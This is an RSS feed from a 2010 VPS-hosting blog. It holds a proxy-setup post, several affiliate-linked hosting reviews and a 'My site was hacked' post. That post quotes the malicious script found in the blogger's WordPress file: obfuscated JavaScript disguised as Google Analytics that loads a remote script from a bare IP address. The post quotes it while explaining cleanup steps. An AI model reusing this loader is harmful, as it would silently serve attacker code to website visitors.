<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>vps hosting &#124; virtual private server</title>
	<atom:link href="http://vpshostingfriends.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://vpshostingfriends.com</link>
	<description>Everything on this blog is about vps hosting</description>
	<lastBuildDate>Fri, 12 Feb 2010 17:38:07 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to set up a private proxy server on my VPS</title>
		<link>http://vpshostingfriends.com/archives/671</link>
		<comments>http://vpshostingfriends.com/archives/671#comments</comments>
		<pubDate>Thu, 11 Feb 2010 13:11:11 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[proxy server]]></category>
		<category><![CDATA[proxy server on vps]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=671</guid>
		<description><![CDATA[A proxy server shares one internet connection with all the computers on your local network or it is a computer that offers a network service allowing clients to make indirect network connections to other network services. So basically a proxy (proxy server) is one that acts as mediator between the client (the computer of a [...]]]></description>
			<content:encoded><![CDATA[<p>A proxy server shares one internet connection with all the computers on your local network or it is a computer that offers a network service allowing clients to make indirect network connections to other network services. So basically a proxy (proxy server) is one that acts as mediator between the client (the computer of a user) and server. When clients request data from an Internet resource, traffic goes from your web browser/application first through the proxy before it reaches the requested sources and back through the proxy which then transmits the data to you. A proxy server sits between a client application, such as a Web browser, and a real server. It intercepts all requests to the real server to see if it can fulfill the requests itself. If not, it forwards the request to the real server.</p>
<p><span style="text-decoration: underline;">How Proxy Servers Work:</span></p>
<p>1.When a computer on the intranet makes a request out to the Internet-such as to retrieve a Web page from a Web server-the internal computer actually contacts the proxy server, which in turn contacts the Internet server. The Internet server sends the Web page to the proxy server, which then forwards the page to the computer on the intranet.</p>
<p>2. Proxy servers log all traffic between the Internet and the intranet. They can log every IP address, date and time of access, URL, number of bytes downloaded, and so on. This information can be used in analyzing any attacks launched against the network. It can also help intranet administrators build better access and services for employees.</p>
<p>3. Some proxy servers work with special proxy clients. A more popular approach is to use off-the-shelf clients such as Netscape with proxy servers. When such an off-the-shelf package is used, it must be specially configured to work with proxy servers from a configuration menu. Then the intranet employee uses the client software as usual. The client software knows to go out to a proxy server to get the data, instead of to the Internet.</p>
<p>4. Proxy servers can do more than relay requests back and forth between an intranet and the Internet. They can also implement security schemes. For example, an FTP proxy server could be set up to allow files to be sent from the Internet to a computer on the intranet, but to block files from being sent from the corporate network out to the Internet-or vice versa. In this way, intranet administrators can block anyone outside the corporation from downloading vital corporate data. Or they can stop intranet users from downloading files which may contain viruses.</p>
<p>5. These can also be used to speed up the performance of some Internet services by caching data-keeping copies of the requested data. For example, a Web proxy server could cache many Web pages, so that whenever someone from the intranet wanted to get one of those Web pages, they could get it directly from the proxy server across high-speed intranet lines, without having to go out across the Internet and get the page at a lower speed from Internet lines.</p>
<p>A Virtual Private Server can work well to set up your own internet browsing proxy. It costs as little as $8 a month, which is roughly the same a private proxy or VPN provider, would charge you. But with you being in full control over the logs and resources on the server which can be used for other things besides hiding your IP when browsing the internet. It can be depicted by the diagram along with the instructions given below:</p>
<p><strong> </strong></p>
<ol>
<li>You will need to install a proxy server on      your machine, this example uses micro proxy,  a small Unix based      HTTP/HTTPS proxy that runs from inetd.</li>
<li>Install xinetd on your server. Set<strong> micro      proxy</strong> to run via <em>xinetd</em> (or inetd if you use that instead).</li>
<li>Force <em>xinetd</em> to start the service for      you by adding the following snippet of code in your <em>etc/services</em> file.</li>
<li>Make sure the ports you want to use are open      on the server, there are various methods to achieve this:</li>
<li>Once you have installed micro proxy,      configured xinetd and edited etc/services you should be done on the server      side, now it is time to configure your internet browser.</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/671/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My site was hacked</title>
		<link>http://vpshostingfriends.com/archives/661</link>
		<comments>http://vpshostingfriends.com/archives/661#comments</comments>
		<pubDate>Wed, 27 Jan 2010 14:53:13 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=661</guid>
		<description><![CDATA[What to do when my site is hacked
The intention of this blog post to help those webmaster whose wordpress sites are hacked. Since I am not a programmer, I can only share what happened to me, and how I solved it. Hopefully this article will bring some value to you, In the article I will [...]]]></description>
			<content:encoded><![CDATA[<p><strong>What to do when my site is hacked</strong></p>
<p>The intention of this blog post to help those webmaster whose wordpress sites are hacked. Since I am not a programmer, I can only share what happened to me, and how I solved it. Hopefully this article will bring some value to you, In the article I will include some resources for further reading.</p>
<p><strong>what happened</strong></p>
<p>When I tried to login to wordpress I got this message "<strong>Parse error: syntax error, unexpected '&lt;' in home/xxxx/xxxxx/xxxx/default-<a href="http://vpshostingfriends.com/wp-content/uploads/2010/01/this-site-may-harm-your-computer.png"><img class="alignright size-full wp-image-662" title="this site may harm your computer" src="http://vpshostingfriends.com/wp-content/uploads/2010/01/this-site-may-harm-your-computer.png" alt="" width="419" height="205" /></a>widegets.php in line 0000</strong>". Now I havent't updated my site for a while, so I am pretty sure it was not me who made the error.</p>
<p>So I downloaded the file to my computer desk top from the location specified in the message, and found this script in line 0000</p>
<p><strong>"</strong><span style="color: #999999;"><em>&lt;html&gt;&lt;body&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript srñ='" + gaJsHost + "google-analytics.com/ga.js' " + '!@&amp;s(#r)c@!=&amp;)\'&amp;h$!t^&amp;!$@t@&amp;$p#^&amp;@:$^/&amp;@!&amp;/!9(1)@.(2)1!(2)&amp;.^#6&amp;@&amp;!^5(@!&amp;.&amp;#$1@!4)8!#/($g#$a&amp;.(j^s)'.replace(/#|&amp;|@|\$|\(|\!|\^|\)/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;/body&gt;&lt;/html<strong>&gt;</strong></em></span></p>
<p>My one wasn't exactly the same but very similar and has a lot more codes in it, So I removed the code by upgrading my wordpress blog in cPanel, when it was completed I went to check my site again, and this time the error message was even better " This site may harm your computer ".</p>
<p><strong>So it was comfirmed by Google the site was hacked. </strong></p>
<p><strong>solutions</strong><br />
1. Locate your ip</p>
<p>If you don't know your local ip here are the steps</p>
<p>For Windows</p>
<p><strong>Start<br />
Run<br />
ipconfig</strong></p>
<p>For Linux</p>
<p><strong>Applications<br />
Accessories<br />
ifconfig</strong></p>
<p><strong>2 Who logged into system</strong></p>
<p>This can be found within your cpanel last login, it should be your ip<a href="http://vpshostingfriends.com/wp-content/uploads/2010/01/cpanel.gif"><img class="alignright size-full wp-image-663" title="cpanel" src="http://vpshostingfriends.com/wp-content/uploads/2010/01/cpanel.gif" alt="" width="381" height="259" /></a></p>
<p><strong>3. Enable log archiving in cPanel</strong></p>
<p><strong>4. Take your site offline by create maintenance.php and editing .htaccess file.</strong></p>
<p><strong>5. Report to your hosting company</strong><br />
Most companies will be restoring your site or helping you solve the problems, some won't, but unless you try you won't know, and  if your company does not want to help, it is probably time for you change a host.</p>
<p><strong>6. Scan your computer</strong><br />
Scan your computer thoroughly using 2 or more antivirus systems listed below, if your site has more administrators, you should inform them to do the same</p>
<p><strong>7.</strong> <strong>Upgrade all your thirdparty scripts </strong>to the latest version, such as wordpress , joomla, drupal. etc.</p>
<p><strong>8. Change all your passwords, I mean all</strong>.</p>
<p><strong>9. download all the files</strong> to your computer and scan them with antivirus softwares.</p>
<p>After the scan you want to look into every single file and find out if there is any other hacking scripts in the files</p>
<p><strong>10. Once you are happy and sure all the files are clean, </strong>ask for a review in you google webmaster tools, it will take less than a day usually before they unmark your site.</p>
<p>For a more complete step by step solutions <a href="http://25yearsofprogramming.com/blog/20070705.htm" target="_blank">click here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/661/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The need to know before sign up for any hosting service</title>
		<link>http://vpshostingfriends.com/archives/360</link>
		<comments>http://vpshostingfriends.com/archives/360#comments</comments>
		<pubDate>Sat, 09 Jan 2010 12:03:13 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=360</guid>
		<description><![CDATA[When you're signing up to any web hosting services, may it be dedicated, vps or shared hosting, it's easy to get lost in the jargon and sign on the dotted line before really knowing what exactly you're going to be paying for. The key is to remember that, as with any service you're looking to [...]]]></description>
			<content:encoded><![CDATA[<p>When you're signing up to any web hosting services, may it be dedicated, vps or shared hosting, it's easy to get lost in the jargon and sign on the dotted line before really knowing what exactly you're going to be paying for. The key is to remember that, as with any service you're looking to invest in, research is vital. <a href="http://www.freshbusinessthinking.com/business_advice.php?AID=4275&amp;Title=Your+Web+Hosting+Contract+%96+Remember+To+Read+The+Small+Print+" target="_blank">read the full article here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/360/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Reliable UK &amp; US Debian vps hosting</title>
		<link>http://vpshostingfriends.com/archives/144</link>
		<comments>http://vpshostingfriends.com/archives/144#comments</comments>
		<pubDate>Tue, 22 Dec 2009 17:19:20 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[Linux VPS]]></category>
		<category><![CDATA[VPS UK]]></category>
		<category><![CDATA[VPS US]]></category>
		<category><![CDATA[debian]]></category>
		<category><![CDATA[debian vps providers]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=144</guid>
		<description><![CDATA[There are dozens of companies provding debian vps, and if I tell you that I have been a customer of all of them that would be a lie.
However, I have searched all over the internet, browsing through popular review sites, webmasters forums, blogs, questions &#38; answers websites, as well as talking to those vps hosting [...]]]></description>
			<content:encoded><![CDATA[<p>There are dozens of companies provding <em>debian vps</em>, and if I tell you that I have been a customer of all of them that would be a lie.</p>
<p>However, I have searched all over the internet, browsing through popular review sites, webmasters forums, blogs, questions &amp; answers websites, as well as talking to those vps hosting companies customer service staffs,  so if you want to spend two days reading boring reviews, well, be my guest.</p>
<p>I had a list of 20 <em>debian vps</em> providers, after evaluating them on customers experience and hardwares, and plans, only 4  left on my list, which are listed below.<img class="alignright size-full wp-image-147" title="debian logo" src="http://vpshostingfriends.com/wp-content/uploads/2009/12/debian-logo.jpeg" alt="debian logo" width="104" height="136" /></p>
<p><span style="text-decoration: underline;"><strong>VPS.NET</strong></span></p>
<p>Cloud vps</p>
<p>Datacenters are located in both US and UK</p>
<p><strong>$20 / month</strong> = 0.4GHz CPU, 256 RAM, 10GB storage, 250GB bandwidth</p>
<p>For more Info <a href="http://www.vps.net?bid=190&amp;aid=CD3108&amp;opt" target="_blank">click here</a></p>
<p><span style="text-decoration: underline;"><strong>Pandela</strong></span></p>
<p>8-Core Servers,   Virtuozzo/Hyper V</p>
<p>256MB RAM, 200GB Banwidth, 5GB storage      $17</p>
<p>2048 MB RAM, 1500 GB Bandwidth,  50GB storage $64</p>
<p>Additional IP's:      $1/mth<br />
Extra Bandwidth:     $0.25/GB</p>
<p>For more Info <a href="http://www.kqzyfj.com/click-3684103-10689378" target="_blank">click here</a></p>
<p><span style="text-decoration: underline;"><strong>Sitevalley</strong></span></p>
<p>xen servers<strong><br />
</strong></p>
<p><strong>$14.95 / month</strong> = 256 MB Dedicated Memory, 256 MB SWAP Memory, 20 GB storage, 100 GB Bandwidth</p>
<p><strong>$49.95 / month</strong> = 1024 MB Dedicated Memory, 1024 MB SWAP Memory, 80 GB storage, 500 GB Bandwidth, 4 Dedicated IP</p>
<p>Adult allowed</p>
<p>For more Info <a href="http://www.sitevalley.com/clients/aff.php?aff=053" target="_blank">click here</a></p>
<p><strong><span style="text-decoration: underline;">Eukhost</span> - </strong>uk webhosting provider</p>
<p>Virtuozzo server</p>
<p>£ 19 / month = 15 GB Web Space, 300 GB Monthly Bandwidth, 384 MB Guaranteed RAM</p>
<p>£ 39 / month =  45 GB Web Space,   500 GB Monthly Bandwidth, 640 MB Guaranteed RAM</p>
<p>Muiltply by 10 is your yearly price</p>
<p>For more Info <a href="http://www.eukhost.com/affiliate/idevaffiliate.php?id=8291" target="_blank">click here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/144/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>3 Months FREE offer ends December 31st!</title>
		<link>http://vpshostingfriends.com/archives/138</link>
		<comments>http://vpshostingfriends.com/archives/138#comments</comments>
		<pubDate>Mon, 14 Dec 2009 18:29:57 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=138</guid>
		<description><![CDATA[1and1 internet is giving away 3 months free hosting. click this link  to get you 3 month free hosting.
]]></description>
			<content:encoded><![CDATA[<p>1and1 internet is giving away 3 months free hosting.<a href="http://www.dpbolvw.net/click-3684103-10365674" target="_top"> click this link </a><img src="http://www.awltovhc.com/image-3684103-10365674" width="1" height="1" border="0"/> to get you 3 month free hosting.</p>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/138/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A2hosting &#8211; Low Price = Poor Quality ?</title>
		<link>http://vpshostingfriends.com/archives/131</link>
		<comments>http://vpshostingfriends.com/archives/131#comments</comments>
		<pubDate>Fri, 11 Dec 2009 17:35:08 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[Linux VPS]]></category>
		<category><![CDATA[VPS US]]></category>
		<category><![CDATA[cheap vps]]></category>
		<category><![CDATA[a2hosting]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=131</guid>
		<description><![CDATA[A2hosting offers $8.97/month VPS hosting plan,  no set fee, the promotion ends on the 31st of Dec.
The cPanel installation assistance service is reasonally priced, it costs $50 one time fee, as many other vps hosting companies would ask you sign up for their managed service which is usually more expensive.
30 Day money back guarantee, it [...]]]></description>
			<content:encoded><![CDATA[<p><strong>A2hosting</strong> offers <em>$8.97/month VPS hostin</em>g plan,  no set fee, the promotion ends on the 31st of Dec.</p>
<p>The <strong>cPanel installation assistance service</strong> is reasonally priced, it costs $50 one time fee, as many other vps hosting companies would ask you sign up for their managed service which is usually more expensive.</p>
<p><strong>30 Day money back guarantee,</strong> it is neccessery to know what the refund policy is before sigining up with any hosting companies, for a2hosting, only the month fee is refunable, one time fees such, ssl, cpanel set up assistance will not be refunded. Payment made by cheques and dedicated servers will not be refunded either.</p>
<h3>Hardware</h3>
<p>The<strong> a2hosting </strong>basic vps plan includes 128 Guaranteed Ram with 256 burstable ram, so your website will still be accessible even if it has exceed it ram limit. 10 GB storage and 100 GB Bandwidth / Data Transfer, unless you are hosting a huge ecommerce site (not as huge as eBay tho) with huge amount of page views per day, this should do you.</p>
<h3>Software</h3>
<p>Many Linux based OS to choose from,to name a few, Gentoo, Debian, Centos etc</p>
<p>2 virtualization systems, xen &amp; openvz, in case you don't know the difference is, xen allows you to have multiple OS/operating system installation, as OpenVZ has 4 times less CPU consumption, less overhead, and more stable. They all have their advantages but if you only need vps for standard websites, then OpenVZ is the choice.</p>
<p><strong>A2hosting</strong> offers 2 cPanel templates for vps customers, standard and advanced.  basically advanced template is the same as the one in shared hosting, this is great for any one who is new to vps and would like to use cPanel.</p>
<h3>Customers Service</h3>
<p><strong>99.9% Uptime policy</strong>, <strong>a2hosting</strong> has good reputation for their server uptime, although like many other companies, scheduled maintainances are not included in the uptime gurantee. Toll free phone support for US and Canada. Live support, Feedback  button shows that a2hosting is continually working on their customers experiences and it is definitely a sign of good customer support.</p>
<h3>Conclusion</h3>
<p><strong>A2hosting</strong> is an affordable vps hosting provider that has good customer support and plans that are suitable for absolute beginners in vps.<a href="http://www.jdoqocy.com/click-3684103-10687827" target="_self"> Click here to visist A2hosting</a></p>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/131/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cheap vps hosting packages are not all bad</title>
		<link>http://vpshostingfriends.com/archives/112</link>
		<comments>http://vpshostingfriends.com/archives/112#comments</comments>
		<pubDate>Mon, 07 Dec 2009 14:58:14 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[cheap vps]]></category>
		<category><![CDATA[budget vps]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=112</guid>
		<description><![CDATA[This post has been moved to cheap vps page
Click here to access it
]]></description>
			<content:encoded><![CDATA[<p>This post has been moved to <a href="Pros  Obviously the price is the biggest pro among cheap vps hosting companies, and some do provide a good choice of features and packages. Cons  I can't say for all, but most of the cheap vps hosting providers do not have their own data centers, in fact they either hire or are resellers of big hosting companies, that means you will wait longer to get an issue resolved, so my recommendation is to not host your important site with them. Moreover, many of the providers do not back up your data daily even weekly.So if you are looking for a reliable with good customer support, and keeping the cost down a shared hosting might still be a good choice, otherwise increase your budget for a good vps provider. Not all bad  Everything has a good side, it is true with cheap vps too. For example, if you are new to vps and don't have a big budget for start, cheap vps is a solution, you can learn how to use vps, and you will have a better understanding of vps hosting without spending a lot of money. Some of the cheap vps hositng companies provide premium packages, which enables you to upgrade your hosting account without tranferring all your files to  a different host.  Make sure you are aware of their terms of services as some of the cheap VPS hosting companies do not provide free technical support. If you are new to vps and your budget allows, take a look our top 10 vps providers page." target="_self">cheap vps</a> page</p>
<p><a href="Pros  Obviously the price is the biggest pro among cheap vps hosting companies, and some do provide a good choice of features and packages. Cons  I can't say for all, but most of the cheap vps hosting providers do not have their own data centers, in fact they either hire or are resellers of big hosting companies, that means you will wait longer to get an issue resolved, so my recommendation is to not host your important site with them. Moreover, many of the providers do not back up your data daily even weekly.So if you are looking for a reliable with good customer support, and keeping the cost down a shared hosting might still be a good choice, otherwise increase your budget for a good vps provider. Not all bad  Everything has a good side, it is true with cheap vps too. For example, if you are new to vps and don't have a big budget for start, cheap vps is a solution, you can learn how to use vps, and you will have a better understanding of vps hosting without spending a lot of money. Some of the cheap vps hositng companies provide premium packages, which enables you to upgrade your hosting account without tranferring all your files to  a different host.  Make sure you are aware of their terms of services as some of the cheap VPS hosting companies do not provide free technical support. If you are new to vps and your budget allows, take a look our top 10 vps providers page." target="_self">Click here to access it</a></p>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/112/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Don&#8217;t get fooled by anhosting coupon</title>
		<link>http://vpshostingfriends.com/archives/109</link>
		<comments>http://vpshostingfriends.com/archives/109#comments</comments>
		<pubDate>Sun, 06 Dec 2009 14:22:01 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[anhosting]]></category>
		<category><![CDATA[anhosting coupon]]></category>
		<category><![CDATA[drupal]]></category>
		<category><![CDATA[review]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=109</guid>
		<description><![CDATA[Many sites are offering 25% off anhosting coupon code, in fact, anhosting does not provide coupons, the 25% off is their current promotion, so with or without, you will get a nice 25% discount. If you don't believe me  Click Here to see for yourself, below is the anhosting review
Intruduction to Anhositng
Anhosting is located [...]]]></description>
			<content:encoded><![CDATA[<p>Many sites are offering 25% off <em>anhosting coupon</em> code, in fact, <em>anhosting</em> does not provide <em>coupons</em>, the 25% off is their current promotion, so with or without, you will get a nice 25% discount. If you don't believe me  <a href="http://manage.aff.biz/z/115/CD3108/">Click Here</a> to see for yourself, below is the <em>anhosting review</em></p>
<p><strong>Intruduction to Anhositng</strong></p>
<p>Anhosting is located in Spring Creek Parkway Providence, UT and is a sister site of <a href="http://manage.aff.biz/z/138/CD3108" target="_blank">midphase</a>, <a href="http://vpshostingfriends.com/3/vps-net-hosting-review/" target="_self">vps.net</a>, uk2, and a few more. They only offer shared hosting plans suitable for standard websites, and host more blogs then many other hosting providers.</p>
<p><strong>Features</strong></p>
<p>Mysql 5 database, php 5, and fantastico are all included in the hosting package, that means you can create wordpress blog, joomla, drupal, with 2 or 3 clicks using fantastico, MySQL allows to set up new databases easily. Php 5 is required by many applications such wordpress plugins.</p>
<p><strong>Price</strong></p>
<p>$5.21/month is a pretty standard price, their sister site midphase offers $2.95/month packages. One thing I suggest you to do though is to ask them what is the price for second year, as with many hosting companies the price is way higher than the first year.</p>
<p><strong>Conclusion</strong></p>
<p>Even though <em>Anhosting coupon</em> isn't available, you will still get a nice discount, also they offer reasonably priced packages and good customer support. Their hosting plans are more than enough to get you started, once your site gets bigger, it will be the time to think about switching to vps or dedicated, I think it is good to start with <strong>anhosting</strong> or <strong>Midphase</strong>, because if you want to change to vps, you will probably get nice discount from their sister sites that offer vps hosting plans such as<a href="http://www.vps.net?bid=190&amp;aid=CD3108&amp;opt" target="_blank"> vps.net.</a></p>
<p><a href=" http://manage.aff.biz/z/115/CD3108/" target="_blank">Click here to visit Anhosting</a></p>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/109/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Illegal immigrants can not use 1&amp;1 internet</title>
		<link>http://vpshostingfriends.com/archives/87</link>
		<comments>http://vpshostingfriends.com/archives/87#comments</comments>
		<pubDate>Mon, 30 Nov 2009 16:15:40 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[Linux VPS]]></category>
		<category><![CDATA[VPS Canada]]></category>
		<category><![CDATA[VPS UK]]></category>
		<category><![CDATA[VPS US]]></category>
		<category><![CDATA[Windows VPS]]></category>
		<category><![CDATA[cheap vps]]></category>
		<category><![CDATA[1&1]]></category>
		<category><![CDATA[1&1 internet]]></category>
		<category><![CDATA[1and1]]></category>
		<category><![CDATA[domain]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[VPS]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=87</guid>
		<description><![CDATA[I was browsing through 1&#38;1 internet reviews, and came across a post in one of the forums suggests that you need to provide your passport copy and very very personal information in order to sign up for their services, sounds like 1and1 has become the online police department.
So out of curiosity I had a look [...]]]></description>
			<content:encoded><![CDATA[<p>I was browsing through <strong>1&amp;1 internet</strong> reviews, and came across a post in one of the forums suggests that you need to provide your passport copy and very very personal information in order to sign up for their services, sounds like 1and1 has become the online police department.</p>
<p>So out of curiosity I had a look in 1&amp;1 internet privacy policy, where I found no mentions regarding to passports. That's why it is time for us to focus on the problems, pros and cons.</p>
<p><strong>Problems</strong></p>
<p>Not receiving validation email, You should get it right after you sign up, otherwise check your spam filter first, if still not, well, wait for a while and contact their support, for vps and dedicated may take up to 5 days to set up.</p>
<p>other problems are not really problems, such as how to set up joomla, wordpress, all you need to do is to use an ftp client such as filezilla, if you don't know how to do it, let me know, I will make a video on that.</p>
<p><strong>Pros</strong></p>
<p>Good variety of hosting plans, shared hosting, vps, dedicated servers etc. The starting price is surprisingly low for dedicated server, only $49/month,  as for shared hosting and vps are pretty much the same as many other hosting providers.</p>
<p>I like the sound of green hosting, it feels like that we are helping to protect the environment as we are building our sites.</p>
<p>90 day money back guarantee (does not apply to dedicated), while most of the hosting companies offer only 30 days.</p>
<p>24/7 support which is pretty standard with all the big hosting companies, although I am a big fan (my surname is Fan too, and I am big) of live chat support, which is not available.</p>
<p><strong>Cons</strong></p>
<p>The account cancellation in<strong> 1&amp;1 internet</strong> can be tricky, many customers had complaints on that issue, so read through their policies before you purchase 1&amp;1 internet hosting plans (that applies to any other hosting companies)</p>
<p>Even though <strong>1and1</strong> and many other hosting companies provide a free domain when you sign up, but unless you are just testing it out and don't care about the site much, don't use the free domain provided for your site. I think we can all afford $10 for a domain name.</p>
<p>Conclusion</p>
<p>Don’t decide whether to register for a hosting account with <strong>1&amp;1 internet</strong> or not based on what I have just said, as I always suggest do more researches before buying any hosting service, and that will save you a lot of headaches and nightmares in the future. Watch my video “<a href="http://vpshostingfriends.com/84/reliable-hosting-service/" target="_blank">how to find a reliable hosting service</a>”, and don’t forget to order hosting services through my links, because you will get a nice gift, actually a few. <a href="http://vpshostingfriends.com/special-gifts/" target="_self">Click to see what you will get</a></p>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/87/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to find a reliable hosting service</title>
		<link>http://vpshostingfriends.com/archives/84</link>
		<comments>http://vpshostingfriends.com/archives/84#comments</comments>
		<pubDate>Mon, 30 Nov 2009 15:54:39 +0000</pubDate>
		<dc:creator>myvps</dc:creator>
				<category><![CDATA[Best VPS Hosting]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[reliable hosting reviews]]></category>
		<category><![CDATA[reliable hosting service]]></category>

		<guid isPermaLink="false">http://vpshostingfriends.com/?p=84</guid>
		<description><![CDATA[As  customers, we can only hope that we will find a reliable hosting service, which will meet our expectations. Reading reviews is helpful, but first we will need to find a resource of reliable hosting reviews.
In the video below I will show you one of the best resources for finding reliable hosting services and real [...]]]></description>
			<content:encoded><![CDATA[<p>As  customers, we can only hope that we will find a <em>reliable hosting service</em>, which will meet our expectations. Reading reviews is helpful, but first we will need to find a resource of <em>reliable hosting reviews</em>.</p>
<p>In the video below I will show you one of the best resources for finding reliable hosting services and real user reviews.</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="445" height="364" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/oEQl0JGNLKM&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;color1=0x006699&amp;color2=0x54abd6&amp;border=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="445" height="364" src="http://www.youtube.com/v/oEQl0JGNLKM&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;color1=0x006699&amp;color2=0x54abd6&amp;border=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Have you watched it?</p>
<p>Hopefully that helped, and let me know how I can be more helpful.</p>
]]></content:encoded>
			<wfw:commentRss>http://vpshostingfriends.com/archives/84/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
